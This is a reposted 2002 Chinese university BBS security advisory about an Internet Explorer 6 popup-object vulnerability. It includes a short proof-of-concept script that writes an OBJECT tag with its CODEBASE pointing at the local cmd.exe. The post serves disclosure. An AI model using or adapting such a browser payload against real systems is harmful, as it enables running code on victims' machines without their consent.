荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: Kernel (空を见上げて), 信区: Security
标  题: 微软IE的弹出对象存在严重的可执行文件漏洞
发信站: 荔园晨风BBS站 (Sat Jan 19 11:25:14 2002), 转信

发布日期:2002-1-15

  受影响系统:

  IE 6.0.2600.0000

  + Windows 2000 Update Versions: Q312461; Q240308;Q313675

  漏洞描述:

  IE的PopUp对象允许插入一个内置对象,并且可以在高权限下运行本地的应用
程序。

  下面是一个测试脚本:

  <script>

  var x = window.open();

  x.document.body.innerHTML = ‘<OBJECT NAME="X" CLASSID="CLSID:
11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/cmd.
exe">‘;

  </script>






--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.13.83]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店